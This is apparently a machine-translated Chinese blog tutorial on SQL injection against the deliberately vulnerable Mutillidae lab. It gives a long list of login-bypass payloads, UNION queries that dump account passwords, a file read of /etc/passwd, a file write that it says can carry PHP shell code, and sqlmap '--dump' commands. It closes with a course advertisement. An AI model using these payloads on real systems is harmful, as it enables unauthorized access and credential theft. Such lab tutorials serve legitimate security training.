0x00前言
SQL注入是一种注入攻击,可以执行恶意SQL语句。这些语句控制Web应用程序后面的数据库服务器。攻击者可以利用SQL 注入漏洞规避应用程序安全性方面的努力。他们可以绕过页面或Web应用程序的身份验证和授权,并恢复整个SQL数据库的内容。他们同样可以利用SQL注入来包含,更改和擦除数据库中的记录。SQL注入漏洞可能会影响使用SQL数据库的任何站点或Web应用程序,例如MySQL,Oracle,MSSQL或其他。攻击者可能会利用它来增加对您的敏感信息,客户数据,商业秘密,许可创新的未经许可的访问,而这仅仅是冰山一角。
而由于sql注入漏洞得利用有些广泛,因此我们将无法提及SQL注入的所有细节,而是从基础知识开始对其中的一些内容进行说明。为此,我们将使用metasploitable的Mutillidae Web应用程序,该Web应用程序仅出于演示目的容易受到SQL 注入攻击。
选择“ Mutillidae”链接,然后转到“登录/注册”选项卡并注册以创建一个帐户。
提供必要的信息,然后单击“创建帐户”按钮。
现在,让我们使用一些SQL注入技术来绕过登录页面,本教程介绍了攻击者可以用来破坏登录表单的不同方法。
0x01 在POST字段中发现SQL注入
我们将在示例中使用的登录结构非常简单。它包含两个易受攻击的输入字段(用户名和密码)。后端内容创建查询以批准客户端提供的用户名和密钥。以下是页面基本原理的概述:
$ query =“SELECT * FROM users where where username =’$ _ POST [username]‘AND password =’$_POST[password]’”;
为了避开登录和访问受限区域,攻击者需要构建一个SQL部分,该部分将更改“ WHERE”子句并将其设为true。例如,随附的登录数据将通过滥用password参数中存在的弱点来提供对攻击者的访问权限。对于用户名,请输入“ john.doe”或“ anything”,对于密码,请输入“ anything” or“ 1” =‘1)或(admin(or’1’='1),然后尝试登录,然后您将显示一个管理员登录页面。
让我们看一下生成的查询:
SELECT * FROM users,其中username ='john.doe’AND password =‘anything’or’1’=‘1’
由于操作员的优先权,“and”条件将首先评估。
然后评估“ OR”运算符,使“ WHERE”语句为真。该条件对“users”表的所有行均有效。这意味着将忽略给定的用户名,并且攻击者将以“users”表中的主要用户身份登录。此外,这意味着攻击者无需知道用户名即可访问框架。查询将为他发现一个!
在这些简单的示例中,我们已经看到入侵者可以回避使用SQL注入的身份验证系统。在不限制可能造成的灾难性后果的情况下,必须提到的是,SQL注入比登录绕过具有更大的安全影响。以下是OWASP成员Emin Islam Tatlilf博士创建的命令列表,这些命令可用于SQL注入身份验证旁路。
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin’--
admin’ #
admin’/*
admin’ or ‘1’=’1
admin’ or ‘1’=’1'--
admin’ or ‘1’=’1'#
admin’ or ‘1’=’1'/*
admin’or 1=1 or ‘’=’
admin’ or 1=1
admin’ or 1=1--
admin’ or 1=1#
admin’ or 1=1/*
admin’) or (‘1’=’1
admin’) or (‘1’=’1'--
admin’) or (‘1’=’1'#
admin’) or (‘1’=’1'/*
admin’) or ‘1’=’1
admin’) or ‘1’=’1'--
admin’) or ‘1’=’1'#
admin’) or ‘1’=’1'/*
1234 ‘ AND 1=0 UNION ALL SELECT ‘admin’, ‘81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin” #
admin”/*
admin” or “1”=“1
admin” or “1”=“1”--
admin” or “1”=“1”#
admin” or “1”=“1”/*
admin” or 1=1 or ““=“
admin” or 1=1
admin” or 1=1--
admin” or 1=1#
admin” or 1=1/*
admin”) or (“1”=“1
admin”) or (“1”=“1”--
admin”) or (“1”=“1”#
admin”) or (“1”=“1”/*
admin”) or “1”=“1
admin”) or “1”=“1”--
admin”) or “1”=“1”#
admin”) or “1”=“1”/*
1234 “ AND 1=0 UNION ALL SELECT “admin”, “81dc9bdb52d04dc20036dbd8313ed055
0x02 绕过登录字段
在此示例中,我们将仅定位用户名字段并尝试获得访问权限。用户名字段也很容易受到攻击,同样也可能被滥用来访问框架。攻击者绕过身份验证的要求不高,而且逐渐变得常识,因为他可以选择他可能想要登录的用户记录。
这是SQL注入攻击的外观。将(admin’#)或(admin’–)放在用户名字段中,然后按“ Enter”登录。我们使用“#”或“–”来注释用户名后告诉查询语句的所有内容忽略密码字段的数据库:(选择*来自用户,其中username =‘admin’#AND password =’’)。通过使用行注释,攻击者可以消除部分登录条件并获得访问权限。这项技术将使“ WHERE”子句仅对一个用户成立。在这种情况下,它是“管理员”。
0x03 基于联合的SQL注入
基于UNION的SQL注入攻击使分析仪可以有效地从数据库中提取数据。由于如果两个查询的结构完全相同,则必须使用“ UNION”运算符,因此攻击者必须像第一个查询一样编写“ SELECT”语句。为此,必须知道一个实质性的表名,但是决定第一个查询中的列数及其信息类型同样至关重要。
在本教程中,我们将使用Mutillidae 的“用户信息”页面执行基于联合的SQL注入攻击。转到“ OWASP Top 10 / A1 —注入/ SQLi —提取数据/用户信息”,并使用在我们上面学习的登录绕过技术来访问该页面。
我们所有的攻击媒介都将使用基于联合的技术在页面的URL部分中执行。
有两种不同的方法来发现原始查询选择了多少列。首先是注入“ ORDER BY”语句以查询列号。给定指定的列数大于“ SELECT”语句中的列数,将返回错误。否则,结果将按提到的列进行排序。
由于我们不知道列数,因此我们从100开始。使用二分法,要找到确切的列数,请减少列数,直到返回与“ ORDER BY”子句相关的错误为止。在此示例中,我们将其减少到6列并收到一条错误消息,因此这意味着列数少于6。
当我们输入5列是,它可以工作并显示一些信息。这意味着我们可以使用5列。
接下来,而是采用 了“order by”选项,让我们使用“union select”选项,并提供所有5列。例如:
union select 1,2,3,4,5
如上图中所示,第2、3和4列显示出来了可用,因此我们可以将这些数字替换为任何数据库值以查看它们对应的含义。让我们将第2列更改为“ database()”,将第 3列更改为“ user()”,将第4列更改为“ version()”。
例如:
union select 1,database(),user(),version(),5
这个联合命令为我们提供了一些有用的信息。现在,我们知道数据库为“ owasp10”,其用户为“ root@localhost”,服务器的版本为“ 5.0.51a-3ubuntu5”。根据这些信息,我们可以搜索一些漏洞或exp,以进一步破坏目标。
0x04 查找数据库表
在构建查询数据库以提取敏感数据之前,攻击者必须认识到他需要提取哪些信息以及该信息在数据库中的存储位置。首先,必须意识到您很可能查看数据库用户有权访问的表。换句话说,您的会话客户端很可能会声明或已向客户端授予一定授权的概要表。其他所有表似乎都不存在。
在MySQL中,表“ information_schema.tables”包含用表项标识的所有元数据。下面列出了此表上最有用的信息。
“ table_name”:表的名称。
“ table_schema”:表模式名。
如果要限制返回到当前模式的表的列表,则可以添加“ WHERE”子句以结合“ DATABASE()”和“ SCHEMA()”函数来过滤此列。
例如:
union select 1,table_name,null,null,5 from information_schema.tables where table_schema = ‘owasp10’
在这里,我们要从“ owasp 10”数据库中检索表名
如上图所见,我们可以访问多个名为“accounts(账号)”,“ blogs_table”,“ captured_data”,“ credit_cards”,“ hitlog ”和“ pen_test_tools”的表。
0x05提取敏感数据,例如密码
当攻击者知道表名时,他需要发现提取数据的列名。在MySQL中,表“ information_schema.columns”提供有关表中列的数据。要提取的最有用的列之一称为“ column_name”。”
例如:
union select 1,colunm_name,null,null,5 from information_schema.columns where table_name = ‘accounts’
在这里,我们尝试从“帐户”表中提取列名称。
一旦发现所有可用的列名,我们就可以通过在查询语句中添加这些列名来从中提取信息。
例如:
union select 1,username,password,is_admin,5 from accounts
如上图所示,我们设法检索了与此数据库相关的所有用户名和密码。
0x06 在Web服务器上读写文件
在本小节内容中,我将告诉您访问目标计算机上文档的最佳方法,就像如何将自己的文件和代码传输到目标计算机上一样,而无需踏入目标网站的管理面板。
我们可以使用“ LOAD_FILE()函数”运算符细读网络服务器中包含的任何文件的内容。通常,我们将检查“ / etc / password”文件,以查看是否能幸运地获得用户名和密码,以便以后在爆破攻击中使用。
例:
union select null,load_file(‘/etc/passwd’),null,null,null
我们将利用“ INTO_OUTFILE()”函数为它们提供的所有运算符,并尝试通过SQL注入传输外层代码来尝试建立目标服务器的根目录。请记住,这样做的一般目的是告诉您最佳方法,而不会被管理员面板抓住。这种替代方法使您可以从一列中获取内容,并在整洁的文本文件中发现它们,以保持整洁。您还可以利用它来传输PHPShell代码以执行远程文件包含或CMD执行。
例:
union select null,’Hello World!’,null,null,null into outfile ‘/tmp/hello.txt’
在此示例中,我们将编写“ Hello World!”。句子并将其作为“ hello.txt”文件输出到“ / tmp /”目录中。这个“ Hello World!” 可以用您要在目标服务器中执行的任何PHP Shell代码替换该语句。
如上图中所示,我们成功添加了文本并将其保存为“ hello.txt”文件在“ / tmp”目录中。
0x07 使用SQLmap发现SQL注入并提取数据
Sqlmap是最主流和突破性的SQL注入自动化工具中的佼佼者。给定一个易受攻击的HTTP URL请求,sqlmap可以滥用远程数据库并完成大量黑客操作,例如删除数据库名称,表,列,表中的所有数据,等等。它甚至可以在特定条件下在远程文件系统上读写文档。
不熟悉sqlmap时,可能会很棘手。此sqlmap教学练习旨在以生动,基本的方式展示此主流SQL注入设备的最重要功能。
要启动sqlmap并列出所有可用选项,请键入“ sqlmap --help”。它将提供您需要了解的所有内容以及一些在实践中如何使用它的示例。让我们更仔细地看一下这个工具。
转到Mutillidae登录页面,输入一些错误的凭据,然后按“ Enter”以生成流量并创建URL GET参数。
然后复制URL链接,并在sqlmap工具中使用它。
例:
sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details
这里的“ -u”代表您要执行SQL注入攻击 的 目标URL。要跳过特定于其他DBMS的测试有效负载,请输入“ Y”。
在搜索的几分钟内,sqlmap已经发现用户名是可注入的并且容易受到攻击,如屏幕截图所示。
如果要查找更多漏洞,只需让该过程运行到最后,它就可以找到所有可用漏洞。对于演示,我们将按“ Crtl + C”在此处停止。
在此sqlmap教程中,有关提取数据的事情确实令人着迷。从SQL注入点恢复存储在数据库中的信息是一项艰巨的任务,尤其是当没有结果直接返回到易受攻击的网页中时。幸运的是,使用sqlmap可使分析仪提取宝贵的数据片段,而无须手工操作。首先,让我们使用类似的命令来提取要尝试破解的网站上所有可用的数据库,但最后,为数据库添加“ --dbs”选项。
例:
sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details --dbs
sqlmap提取了所有可用的数据库。要注入更多的SQL查询,我们需要使用相同的命令来了解当前数据库,但将最后一个参数替换为“ --current-db”。
例:
sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details --current-db
此命令的输出显示我们位于“ owasp10”数据库中。
现在,使用命令“ --tables –D owasp10”来查看数据库“ owasp10”的所有可用表。
例:
sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details --tables –D owasp10
如下图所示,我们设法提取了数据库“ owasp10”的所有可用表。
sqlmap还可以通过实现参数“ --columns -T [table_name]”来枚举列。
例:
sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details --columns -T accounts
黑客甚至有可能转储整个表或数据库,并使用选项“ --dump”列出所有有价值的信息。
例:
sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details — columns -T accounts --dump
接下来我将给各位同学划分一张学习计划表!
学习计划
那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:
阶段一:初级网络安全工程师
接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。
综合薪资区间6k~15k
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?
阶段二:中级or高级网络安全工程师(看自己能力)
综合薪资区间15k~30k
7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。
零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完
用Python编写漏洞的exp,然后写一个简单的网络爬虫
PHP基本语法学习并书写一个简单的博客系统
熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)
了解Bootstrap的布局或者CSS。
阶段三:顶级网络安全工程师
学习资料分享
当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份完整版的网络安全(嘿客)全套学习资料已经上传至CSDN官方,朋友们如果需要点击下方链接也可扫描下方微信二v码获取网络工程师全套资料【保证100%免费】
如果你对网络安全入门感兴趣,那么你点击这里👉
1942
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
